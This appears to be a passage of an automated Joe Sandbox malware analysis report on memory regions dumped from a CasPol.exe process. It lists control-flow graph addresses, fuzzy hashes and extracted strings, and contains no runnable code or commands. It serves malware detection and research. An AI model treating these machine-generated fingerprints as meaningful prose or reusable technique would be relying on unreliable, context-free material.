                                    • Opcode Fuzzy Hash: 0ae787aa212fbfc9ce07dbf22c0040a68b7fded4781f4cbaa888d453b9ae1f19
                                    • Instruction Fuzzy Hash: BCC12634A002059FDB10CFA8C480A6EBBF6FF9A324F16852AD559DB742DB34ED40C7A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3946 1fa01ad8-1fa01aef 3948 1fa01af1-1fa01af4 3946->3948 3949 1fa01af6-1fa01afe 3948->3949 3950 1fa01b0a-1fa01b0d 3948->3950 3953 1fa01b05 3949->3953 3951 1fa01b1e-1fa01b21 3950->3951 3952 1fa01b0f-1fa01b12 3950->3952 3954 1fa01b32-1fa01b35 3951->3954 3955 1fa01b23-1fa01b2d 3951->3955 3956 1fa01b19 3952->3956 3953->3950 3957 1fa01b37-1fa01b48 3954->3957 3958 1fa01b69-1fa01b6c 3954->3958 3955->3954 3956->3951 3969 1fa01f51-1fa01f71 3957->3969 3970 1fa01b4e-1fa01b64 3957->3970 3959 1fa01b80-1fa01b83 3958->3959 3960 1fa01b6e-1fa01b75 3958->3960 3964 1fa01b85-1fa01b96 3959->3964 3965 1fa01bb6-1fa01bb9 3959->3965 3962 1fa01f49-1fa01f50 3960->3962 3963 1fa01b7b 3960->3963 3963->3959 3964->3969 3976 1fa01b9c-1fa01bb1 3964->3976 3967 1fa01bfb-1fa01bfe 3965->3967 3968 1fa01bbb-1fa01bf6 3965->3968 3971 1fa01c00-1fa01c2e 3967->3971 3972 1fa01c33-1fa01c36 3967->3972 3968->3967 3984 1fa01f73-1fa01f7e 3969->3984 3985 1fa01fee-1fa01ff0 3969->3985 3970->3958 3971->3972 3977 1fa01c53-1fa01c56 3972->3977 3978 1fa01c38-1fa01c4e 3972->3978 3976->3965 3980 1fa01c73-1fa01c76 3977->3980 3981 1fa01c58-1fa01c6e 3977->3981 3978->3977 3988 1fa01c78-1fa01c87 3980->3988 3989 1fa01c8c-1fa01c8f 3980->3989 3981->3980 3991 1fa01f80-1fa01f83 3984->3991 3994 1fa01ff2-1fa01ff5 3985->3994 3988->3989 3995 1fa01cd1-1fa01cd4 3989->3995 3996 1fa01c91-1fa01ccc 3989->3996 3997 1fa01f85-1fa01f8a 3991->3997 3998 1fa01f8d-1fa01f90 3991->3998 4001 1fa02000-1fa02003 3994->4001 4002 1fa01ff7-1fa01ff9 3994->4002 4003 1fa01cd6-1fa01cdd 3995->4003 4004 1fa01ce8-1fa01ceb 3995->4004 3996->3995 3997->3998 4007 1fa01f92-1fa01f94 3998->4007 4008 1fa01f97-1fa01f9a 3998->4008 4012 1fa02005-1fa02022 4001->4012 4013 1fa02027-1fa0202a 4001->4013 4009 1fa02057-1fa02059 4002->4009 4010 1fa01ffb 4002->4010 4003->3960 4014 1fa01ce3 4003->4014 4015 1fa01d07-1fa01d0a 4004->4015 4016 1fa01ced-1fa01d02 4004->4016 4007->4008 4019 1fa01fc3-1fa01fc6 4008->4019 4020 1fa01f9c-1fa01fbc 4008->4020 4010->4001 4012->4013 4023 1fa0202c 4013->4023 4024 1fa0202e-1fa02031 4013->4024 4014->4004 4021 1fa01d4c-1fa01d4f 4015->4021 4022 1fa01d0c-1fa01d47 4015->4022 4016->4015 4019->4002 4032 1fa01fc8-1fa01fcb 4019->4032 4020->4002 4067 1fa01fbe 4020->4067 4028 1fa01d51 4021->4028 4029 1fa01d5c-1fa01d5f 4021->4029 4022->4021 4023->4009 4026 1fa02033-1fa0203a 4024->4026 4027 1fa02045-1fa02047 4024->4027 4026->4007 4039 1fa02040 4026->4039 4040 1fa02049 4027->4040 4041 1fa0204e-1fa02051 4027->4041 4114 1fa01d51 call 1d7c05df 4028->4114 4115 1fa01d51 call 1d7c0606 4028->4115 4033 1fa01d70-1fa01d73 4029->4033 4034 1fa01d61-1fa01d64 4029->4034 4036 1fa01fd5-1fa01fd8 4032->4036 4037 1fa01fcd-1fa01fd2 4032->4037 4045 1fa01d75-1fa01da4 4033->4045 4046 1fa01da9-1fa01dac 4033->4046 4049 1fa01d6b 4034->4049 4043 1fa01fe8-1fa01feb 4036->4043 4044 1fa01fda-1fa01fe1 4036->4044 4037->4036 4039->4027 4040->4041 4041->3991 4041->4009 4043->3994 4054 1fa01fed 4043->4054 4044->4037 4053 1fa01fe3 4044->4053 4045->4046 4051 1fa01dbd-1fa01dc0 4046->4051 4052 1fa01dae-1fa01db1 4046->4052 4048 1fa01d57 4048->4029 4049->4033 4056 1fa01dd1-1fa01dd4 4051->4056 4057 1fa01dc2-1fa01dc5 4051->4057 4061 1fa01db8 4052->4061 4053->4043 4054->3994 4062 1fa01e16-1fa01e19 4056->4062 4063 1fa01dd6-1fa01e11 4056->4063 4065 1fa01dcc 4057->4065 4061->4051 4068 1fa01e36-1fa01e39 4062->4068 4069 1fa01e1b-1fa01e2a 4062->4069 4063->4062 4065->4056 4067->4019 4070 1fa01e49-1fa01e4c 4068->4070 4071 1fa01e3b-1fa01e44 4068->4071 4074 1fa01e31 4069->4074 4075 1fa01e82-1fa01e85 4070->4075 4076 1fa01e4e-1fa01e7d 4070->4076 4071->4070 4074->4068 4079 1fa01e87-1fa01e97 4075->4079 4080 1fa01e9c-1fa01e9f 4075->4080 4076->4075 4079->4080 4082 1fa01ea1 4080->4082 4083 1fa01ea6-1fa01ea9 4080->4083 4082->4083 4086 1fa01eb6-1fa01eb9 4083->4086 4087 1fa01eab 4083->4087 4090 1fa01efb-1fa01efe 4086->4090 4091 1fa01ebb-1fa01ef6 4086->4091 4111 1fa01eab call 1d7c05df 4087->4111 4112 1fa01eab call 1fa028b8 4087->4112 4113 1fa01eab call 1d7c0606 4087->4113 4092 1fa01f00-1fa01f06 4090->4092 4093 1fa01f0b-1fa01f0e 4090->4093 4091->4090 4092->4093 4097 1fa01f10-1fa01f13 4093->4097 4098 1fa01f1f-1fa01f22 4093->4098 4095 1fa01eb1 4095->4086 4106 1fa01f1a 4097->4106 4102 1fa01f24-1fa01f32 4098->4102 4103 1fa01f37-1fa01f39 4098->4103 4102->4103 4104 1fa01f40-1fa01f43 4103->4104 4105 1fa01f3b 4103->4105 4104->3948 4104->3962 4105->4104 4106->4098 4111->4095 4112->4095 4113->4095 4114->4048 4115->4048
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -KuU^$2Gr$2Gr$2Gr$2Gr$2Gr$=KuU^$MKuU^$]KuU^$mKuU^
                                    • API String ID: 0-2967135423
                                    • Opcode ID: 6b970e43e5fa66ac254ca555d1e9edf0208f6907bbaa229a2ec1db696e7a2337
                                    • Instruction ID: 08276458e5ef6a689ba76d734dc4060a5577a7b34975c482db2afd275658be5c
                                    • Opcode Fuzzy Hash: 6b970e43e5fa66ac254ca555d1e9edf0208f6907bbaa229a2ec1db696e7a2337
                                    • Instruction Fuzzy Hash: 2DE19230A002458FDB15AB79E49039E7BB2EB8A314F60496ED046DF391DB7DEC45C7A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -KuU^$2Gr$2Gr$2Gr$2Gr$2Gr$=KuU^$MKuU^$]KuU^$mKuU^
                                    • API String ID: 0-2967135423
                                    • Opcode ID: d4b078472747632e16df75d80bdd5b88ce31b2e54008f4f6c89c08883d515ab4
                                    • Instruction ID: d2fc258c9a54505df45df721299a4fa669b0eccee4d6253ed6e0c5b6ad64c2e4
                                    • Opcode Fuzzy Hash: d4b078472747632e16df75d80bdd5b88ce31b2e54008f4f6c89c08883d515ab4
                                    • Instruction Fuzzy Hash: 69D1B430A002858FD715AB7DE49029E7BB2AB8A314F60496ED046DF391DF7DEC45CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 4454 1fa05623-1fa05637 4455 1fa05639-1fa05643 4454->4455 4456 1fa0565c-1fa0566a 4454->4456 4457 1fa05645-1fa05656 call 1fa007f0 4455->4457 4458 1fa05658-1fa0565b 4455->4458 4462 1fa05689-1fa05693 4456->4462 4463 1fa0566c-1fa05675 4456->4463 4457->4458 4466 1fa05695-1fa056a6 call 1fa007f0 4462->4466 4467 1fa056a8-1fa056ab 4462->4467 4464 1fa05677-1fa05686 4463->4464 4465 1fa056db-1fa056e9 4463->4465 4464->4462 4468 1fa056eb-1fa056ee 4465->4468 4466->4467 4467->4465 4470 1fa05774-1fa05777 4468->4470 4471 1fa056f4-1fa05769 4468->4471 4473 1fa057c3-1fa057c6 4470->4473 4474 1fa05779-1fa057be 4470->4474 4522 1fa0594d-1fa05994 4471->4522 4585 1fa0576f 4471->4585 4476 1fa057c8-1fa057e6 4473->4476 4477 1fa057eb-1fa057ee 4473->4477 4474->4473 4476->4477 4478 1fa057f0-1fa057f7 4477->4478 4479 1fa0580c-1fa0580f 4477->4479 4483 1fa05aea-1fa05afd 4478->4483 4484 1fa057fd-1fa05801 4478->4484 4485 1fa05815-1fa05837 4479->4485 4486 1fa0589b-1fa0589e 4479->4486 4515 1fa05b63-1fa05b68 4483->4515 4516 1fa05aff-1fa05b0f 4483->4516 4484->4471 4487 1fa05807 4484->4487 4506 1fa05839-1fa0584b 4485->4506 4507 1fa0584d 4485->4507 4489 1fa058a0-1fa058bc 4486->4489 4490 1fa058c1-1fa058c4 4486->4490 4487->4479 4489->4490 4493 1fa058c6-1fa058de 4490->4493 4494 1fa05909-1fa0590c 4490->4494 4512 1fa058e0-1fa058f2 4493->4512 4513 1fa058f4 4493->4513 4498 1fa05939-1fa0593c 4494->4498 4499 1fa0590e-1fa0592e 4494->4499 4498->4499 4502 1fa0593e-1fa05941 4498->4502 4535 1fa05934 4499->4535 4536 1fa05a6e-1fa05a80 4499->4536 4510 1fa05943 4502->4510 4511 1fa05948-1fa0594b 4502->4511 4519 1fa0584f-1fa05870 4506->4519 4507->4519 4510->4511 4521 1fa059b8-1fa059bb 4511->4521 4511->4522 4523 1fa058f6-1fa05904 4512->4523 4513->4523 4547 1fa05b76-1fa05b79 4515->4547 4517 1fa05b11-1fa05b1b 4516->4517 4518 1fa05b34-1fa05b46 4516->4518 4524 1fa05b30-1fa05b33 4517->4524 4525 1fa05b1d-1fa05b2e call 1fa007f0 4517->4525 4549 1fa05b65-1fa05b6e 4518->4549 4550 1fa05b48-1fa05b64 4518->4550 4545 1fa05872-1fa05884 4519->4545 4546 1fa05886 4519->4546 4531 1fa059c1-1fa059f3 4521->4531 4532 1fa05a47-1fa05a4a 4521->4532 4522->4483 4587 1fa0599a-1fa059ac 4522->4587 4523->4494 4525->4524 4570 1fa059f5-1fa05a07 4531->4570 4571 1fa05a09 4531->4571 4538 1fa05a69-1fa05a6c 4532->4538 4539 1fa05a4c-1fa05a53 4532->4539 4535->4498 4551 1fa05a85-1fa05a88 4536->4551 4538->4536 4538->4551 4539->4483 4548 1fa05a59-1fa05a64 4539->4548 4553 1fa05888-1fa05896 4545->4553 4546->4553 4591 1fa05b7b call 1fa05c18 4547->4591 4592 1fa05b7b call 1fa05bc8 4547->4592 4548->4538 4549->4547 4550->4549 4556 1fa05a8a-1fa05a97 4551->4556 4557 1fa05acd-1fa05acf 4551->4557 4553->4486 4562 1fa05a99-1fa05aa1 4556->4562 4563 1fa05aab-1fa05ac8 4556->4563 4564 1fa05ad1 4557->4564 4565 1fa05ad6-1fa05ad9 4557->4565 4560 1fa05b81-1fa05bb2 4562->4563 4563->4557 4564->4565 4565->4468 4572 1fa05adf-1fa05ae9 4565->4572 4575 1fa05a0b-1fa05a1b 4570->4575 4571->4575 4582 1fa05a33 4575->4582 4583 1fa05a1d-1fa05a31 4575->4583 4586 1fa05a36-1fa05a42 4582->4586 4583->4586 4585->4470 4586->4532 4590 1fa059b3 4587->4590 4590->4521 4591->4560 4592->4560
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0XGr$\OGr$\OGr$\OGr$\OGr$\OGr$^O%r$WFr
                                    • API String ID: 0-1755353336
                                    • Opcode ID: 22cb5326fa7c3e5254dca85a7623eb4c5e4b22b21af3a7de5ed442312e705e9a
                                    • Instruction ID: c110962036eec31a32e4e47c4e8bc71363f27674706fb4c445081fcf171e954d
                                    • Opcode Fuzzy Hash: 22cb5326fa7c3e5254dca85a7623eb4c5e4b22b21af3a7de5ed442312e705e9a
                                    • Instruction Fuzzy Hash: 01E19F34F102459FDB14DBA8E894BAEB7B2AF89314F148429E549EF391DB38EC41CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 4593 1fa056ac-1fa056e9 4596 1fa056eb-1fa056ee 4593->4596 4597 1fa05774-1fa05777 4596->4597 4598 1fa056f4-1fa05769 4596->4598 4599 1fa057c3-1fa057c6 4597->4599 4600 1fa05779-1fa057be 4597->4600 4648 1fa0594d-1fa05994 4598->4648 4711 1fa0576f 4598->4711 4602 1fa057c8-1fa057e6 4599->4602 4603 1fa057eb-1fa057ee 4599->4603 4600->4599 4602->4603 4604 1fa057f0-1fa057f7 4603->4604 4605 1fa0580c-1fa0580f 4603->4605 4609 1fa05aea-1fa05afd 4604->4609 4610 1fa057fd-1fa05801 4604->4610 4611 1fa05815-1fa05837 4605->4611 4612 1fa0589b-1fa0589e 4605->4612 4641 1fa05b63-1fa05b68 4609->4641 4642 1fa05aff-1fa05b0f 4609->4642 4610->4598 4613 1fa05807 4610->4613 4632 1fa05839-1fa0584b 4611->4632 4633 1fa0584d 4611->4633 4615 1fa058a0-1fa058bc 4612->4615 4616 1fa058c1-1fa058c4 4612->4616 4613->4605 4615->4616 4619 1fa058c6-1fa058de 4616->4619 4620 1fa05909-1fa0590c 4616->4620 4638 1fa058e0-1fa058f2 4619->4638 4639 1fa058f4 4619->4639 4624 1fa05939-1fa0593c 4620->4624 4625 1fa0590e-1fa0592e 4620->4625 4624->4625 4628 1fa0593e-1fa05941 4624->4628 4661 1fa05934 4625->4661 4662 1fa05a6e-1fa05a80 4625->4662 4636 1fa05943 4628->4636 4637 1fa05948-1fa0594b 4628->4637 4645 1fa0584f-1fa05870 4632->4645 4633->4645 4636->4637 4647 1fa059b8-1fa059bb 4637->4647 4637->4648 4649 1fa058f6-1fa05904 4638->4649 4639->4649 4673 1fa05b76-1fa05b79 4641->4673 4643 1fa05b11-1fa05b1b 4642->4643 4644 1fa05b34-1fa05b46 4642->4644 4650 1fa05b30-1fa05b33 4643->4650 4651 1fa05b1d-1fa05b2e call 1fa007f0 4643->4651 4675 1fa05b65-1fa05b6e 4644->4675 4676 1fa05b48-1fa05b64 4644->4676 4671 1fa05872-1fa05884 4645->4671 4672 1fa05886 4645->4672 4657 1fa059c1-1fa059f3 4647->4657 4658 1fa05a47-1fa05a4a 4647->4658 4648->4609 4713 1fa0599a-1fa059ac 4648->4713 4649->4620 4651->4650 4696 1fa059f5-1fa05a07 4657->4696 4697 1fa05a09 4657->4697 4664 1fa05a69-1fa05a6c 4658->4664 4665 1fa05a4c-1fa05a53 4658->4665 4661->4624 4677 1fa05a85-1fa05a88 4662->4677 4664->4662 4664->4677 4665->4609 4674 1fa05a59-1fa05a64 4665->4674 4679 1fa05888-1fa05896 4671->4679 4672->4679 4717 1fa05b7b call 1fa05c18 4673->4717 4718 1fa05b7b call 1fa05bc8 4673->4718 4674->4664 4675->4673 4676->4675 4682 1fa05a8a-1fa05a97 4677->4682 4683 1fa05acd-1fa05acf 4677->4683 4679->4612 4688 1fa05a99-1fa05aa1 4682->4688 4689 1fa05aab-1fa05ac8 4682->4689 4690 1fa05ad1 4683->4690 4691 1fa05ad6-1fa05ad9 4683->4691 4686 1fa05b81-1fa05bb2 4688->4689 4689->4683 4690->4691 4691->4596 4698 1fa05adf-1fa05ae9 4691->4698 4701 1fa05a0b-1fa05a1b 4696->4701 4697->4701 4708 1fa05a33 4701->4708 4709 1fa05a1d-1fa05a31 4701->4709 4712 1fa05a36-1fa05a42 4708->4712 4709->4712 4711->4597 4712->4658 4716 1fa059b3 4713->4716 4716->4647 4717->4686 4718->4686
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0XGr$\OGr$\OGr$\OGr$\OGr$\OGr$^O%r$WFr
                                    • API String ID: 0-1755353336
                                    • Opcode ID: bab25b1d666adaf600f293e31ed6821eac80bd0b11b915b0ea9e4865092160a7
                                    • Instruction ID: 5ce4e4ccf41cd7d86f9d0edfae1c2f3f9dc73137f24a8507b84c73f923c6a601
                                    • Opcode Fuzzy Hash: bab25b1d666adaf600f293e31ed6821eac80bd0b11b915b0ea9e4865092160a7
                                    • Instruction Fuzzy Hash: 33C1C334F102559FDB10DBA8E894BAEBBB2AFC9314F148429E549EF391DB78AC01C751
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 5217 203b7eea-203b7eec 5218 203b7f18-203b7f1b 5217->5218 5219 203b7eee 5217->5219 5220 203b7f1d 5218->5220 5221 203b7f32-203b7f35 5218->5221 5222 203b7ef8-203b7f13 5219->5222 5229 203b7f25-203b7f27 5220->5229 5223 203b7f52-203b7f55 5221->5223 5224 203b7f37-203b7f40 5221->5224 5222->5218 5227 203b7f57-203b7f5a 5223->5227 5228 203b7f76-203b7f7f 5223->5228 5225 203b7fe3-203b7ff6 5224->5225 5226 203b7f46-203b7f4d 5224->5226 5226->5223 5230 203b7f5c 5227->5230 5231 203b7f71-203b7f74 5227->5231 5233 203b7d3c-203b7d45 5228->5233 5234 203b7f85 5228->5234 5235 203b7d28-203b7d2c 5229->5235 5236 203b7f2d 5229->5236 5354 203b7f5c call 1d7c05df 5230->5354 5355 203b7f5c call 1d7c0606 5230->5355 5231->5228 5240 203b7f8a-203b7f8d 5231->5240 5233->5225 5239 203b7d4b-203b7d52 5233->5239 5234->5240 5237 203b7fde 5235->5237 5238 203b7d32 5235->5238 5236->5221 5237->5225 5242 203b7d37-203b7d3a 5238->5242 5245 203b7d57-203b7d5a 5239->5245 5246 203b7f9a-203b7f9d 5240->5246 5247 203b7f8f-203b7f93 5240->5247 5242->5233 5242->5245 5243 203b7f62-203b7f6c 5243->5231 5248 203b7d5c-203b7d6b 5245->5248 5249 203b7d70-203b7d73 5245->5249 5251 203b7f9f-203b7fa2 5246->5251 5252 203b7fa7-203b7faa 5246->5252 5247->5237 5250 203b7f95 5247->5250 5248->5249 5257 203b7da3-203b7da6 5249->5257 5258 203b7d75-203b7d98 call 203b7030 5249->5258 5250->5246 5251->5252 5253 203b7fac-203b7fbd 5252->5253 5254 203b7fc2-203b7fc4 5252->5254 5253->5254 5259 203b7fcb-203b7fce 5254->5259 5260 203b7fc6 5254->5260 5261 203b7da8-203b7dbd 5257->5261 5262 203b7dc2-203b7dc5 5257->5262 5258->5247 5311 203b7d9e 5258->5311 5266 203b7be3-203b7be6 5259->5266 5267 203b7fd4-203b7fdd 5259->5267 5260->5259 5261->5262 5268 203b7dcf-203b7dd2 5262->5268 5269 203b7dc7-203b7dca 5262->5269 5272 203b7c08-203b7c0b 5266->5272 5273 203b7be8-203b7c03 5266->5273 5274 203b7ddf-203b7de2 5268->5274 5275 203b7dd4-203b7dda 5268->5275 5269->5268 5279 203b7c0d-203b7c1f call 203b7030 5272->5279 5280 203b7c24-203b7c27 5272->5280 5273->5272 5277 203b7df3-203b7df6 5274->5277 5278 203b7de4-203b7de8 5274->5278 5275->5274 5283 203b7df8-203b7e0b 5277->5283 5284 203b7e10-203b7e13 5277->5284 5278->5237 5281 203b7dee 5278->5281 5279->5280 5285 203b7c29-203b7c32 5280->5285 5286 203b7c3d-203b7c40 5280->5286 5281->5277 5283->5284 5292 203b7e2c-203b7e2f 5284->5292 5293 203b7e15-203b7e25 5284->5293 5285->5224 5291 203b7c38 5285->5291 5294 203b7c4a-203b7c4d 5286->5294 5295 203b7c42-203b7c47 5286->5295 5291->5286 5297 203b7ed3-203b7ed6 5292->5297 5298 203b7e35-203b7eac call 203b7030 * 2 5292->5298 5293->5278 5324 203b7e27 5293->5324 5300 203b7c4f-203b7c60 5294->5300 5301 203b7c65-203b7c68 5294->5301 5295->5294 5306 203b7ed8-203b7edd 5297->5306 5307 203b7ee0-203b7ee3 5297->5307 5351 203b7eb9-203b7ece 5298->5351 5352 203b7eae-203b7eb2 5298->5352 5300->5301 5302 203b7c6a-203b7c7c call 203b7030 5301->5302 5303 203b7c81-203b7c84 5301->5303 5302->5303 5312 203b7c92-203b7c95 5303->5312 5313 203b7c86-203b7c8d 5303->5313 5306->5307 5307->5285 5315 203b7ee9 5307->5315 5311->5257 5318 203b7c9c-203b7c9f 5312->5318 5319 203b7c97 5312->5319 5313->5312 5315->5217 5322 203b7cce-203b7cd1 5318->5322 5323 203b7ca1-203b7cc9 5318->5323 5319->5318 5326 203b7cd3-203b7cd7 5322->5326 5327 203b7ce2-203b7ce5 5322->5327 5323->5322 5324->5292 5326->5258 5329 203b7cdd 5326->5329 5331 203b7cf8-203b7cfb 5327->5331 5332 203b7ce7-203b7cf3 5327->5332 5329->5327 5334 203b7d08-203b7d0b 5331->5334 5335 203b7cfd-203b7d03 5331->5335 5332->5331 5338 203b7d0d-203b7d1e 5334->5338 5339 203b7d23-203b7d26 5334->5339 5335->5334 5338->5339 5339->5235 5339->5242 5351->5297 5352->5351 5354->5243 5355->5243
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :@ r$:@ r$:@ r$:@ r
                                    • API String ID: 0-2335750520
                                    • Opcode ID: ecae9f2604f95daa2d7333ce95e6f9e52bae13b7b2f3673f199a7f644a99e168
                                    • Instruction ID: c04a6ceb003cdf10dc926a853bddabf25025b838abf5f948b8220492502d973c
                                    • Opcode Fuzzy Hash: ecae9f2604f95daa2d7333ce95e6f9e52bae13b7b2f3673f199a7f644a99e168
                                    • Instruction Fuzzy Hash: 57A15670F001054BEB14DBFCC4907AD7AF7EF89358F154829E549E7782CA28DE4187A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 6372 203b6280-203b62e4 6382 203b62eb-203b62ed 6372->6382 6383 203b6613-203b661c 6382->6383 6384 203b62f3-203b6323 6382->6384 6390 203b6329-203b6333 6384->6390 6391 203b65e3 6384->6391 6390->6383 6392 203b6339-203b6342 6390->6392 6393 203b65e8-203b6611 6391->6393 6392->6393 6394 203b6348-203b6364 6392->6394 6393->6383 6410 203b661d-203b6626 6393->6410 6401 203b636a-203b639f 6394->6401 6402 203b65cd-203b65d3 6394->6402 6401->6402 6413 203b63a5-203b63ab 6401->6413 6402->6391 6404 203b65d5-203b65db 6402->6404 6404->6392 6405 203b65e1 6404->6405 6405->6383 6413->6393 6414 203b63b1-203b63b9 6413->6414 6415 203b63bf-203b63d7 6414->6415 6416 203b65bc-203b65bf 6414->6416 6415->6416 6420 203b63dd-203b641b 6415->6420 6416->6391 6417 203b65c1-203b65c7 6416->6417 6417->6402 6417->6413 6425 203b6591-203b65ba 6420->6425 6426 203b6421-203b6439 6420->6426 6425->6410 6425->6416 6426->6425 6429 203b643f-203b6459 6426->6429 6429->6425 6432 203b645f-203b6480 6429->6432 6432->6425 6436 203b6486-203b64a0 6432->6436 6436->6425 6440 203b64a6-203b64c2 6436->6440 6441 203b6507-203b6523 6440->6441 6442 203b64c4-203b64e0 6440->6442 6441->6416 6443 203b6529-203b656d 6441->6443 6442->6425 6447 203b64e6-203b6504 6442->6447 6456 203b657a-203b658f 6443->6456 6457 203b656f-203b6573 6443->6457 6447->6441 6456->6416 6457->6456
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :@ r$_%r$_%r
                                    • API String ID: 0-3555142420
                                    • Opcode ID: e4e82f5f3b128adae46fc6443ea59b01de37a15e8e29d95a8522b6c1382b1249
                                    • Instruction ID: f6fb2b987cf5b1d24073d21cbb2e89c52dda817b9a19ebeb6fd5d2371e79c97b
                                    • Opcode Fuzzy Hash: e4e82f5f3b128adae46fc6443ea59b01de37a15e8e29d95a8522b6c1382b1249
                                    • Instruction Fuzzy Hash: 57A17E74E002049FCB14EFB8D484A5DBBF2AF88315F258529E419EB795DB38EC52CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :@ r$_%r$_%r
                                    • API String ID: 0-3555142420
                                    • Opcode ID: 609906ec827c1a356d3b4320904a75938a2aa89be6b04d057378bf019d62a729
                                    • Instruction ID: 97c22738c6ba18539aaf4efd55e7090fbbcf026b231dd525a09d902b5dc3df38
                                    • Opcode Fuzzy Hash: 609906ec827c1a356d3b4320904a75938a2aa89be6b04d057378bf019d62a729
                                    • Instruction Fuzzy Hash: F6A16D30A002059FCB14DFB8C484A5DBBF2AF85315F258569E419EB796DB38EC82CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: _%r$_%r
                                    • API String ID: 0-3934454027
                                    • Opcode ID: 6612cce095b26aabf54ae7c8f63cd6260bf47f969eb14eb5c33bbf0124a5b159
                                    • Instruction ID: 461a9b29d2ede94cfcc1f1440568c21f6fd6d7fae79095d49a6f5e198394360b
                                    • Opcode Fuzzy Hash: 6612cce095b26aabf54ae7c8f63cd6260bf47f969eb14eb5c33bbf0124a5b159
                                    • Instruction Fuzzy Hash: 15425A34B002098FDB14DBA8C49479EBBF2AF89314F218469E509DB796DF78DD82CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: _%r$_%r
                                    • API String ID: 0-3934454027
                                    • Opcode ID: 62eb0b9d1830991c794ae5052866e9b66aa4f6009f281ce7b8c2b5e83274b7aa
                                    • Instruction ID: f7a6e1012bf59fed8922f2e9c79e60db7f6cd66ff5cf44b3928eedbde6f3c691
                                    • Opcode Fuzzy Hash: 62eb0b9d1830991c794ae5052866e9b66aa4f6009f281ce7b8c2b5e83274b7aa
                                    • Instruction Fuzzy Hash: 81D14B74E002098FDB10CBA8C494B8DB7F1EF49328F268566E509EB756DBB4DD81CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: _%r$_%r
                                    • API String ID: 0-3934454027
                                    • Opcode ID: b4765058d6a53fca9a787ca4d5e079ecb211a21221bbc293719d9e8eb5bf2d0b
                                    • Instruction ID: f2f50035b0bea1e9d1cdfb084a9aeb8729f6782eeb270d4129e58ef3b3fd7b42
                                    • Opcode Fuzzy Hash: b4765058d6a53fca9a787ca4d5e079ecb211a21221bbc293719d9e8eb5bf2d0b
                                    • Instruction Fuzzy Hash: BE616D30A102158FCB54DFB8C494A9DFBF2AF89324F19C569D409AB351DB74EC82CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
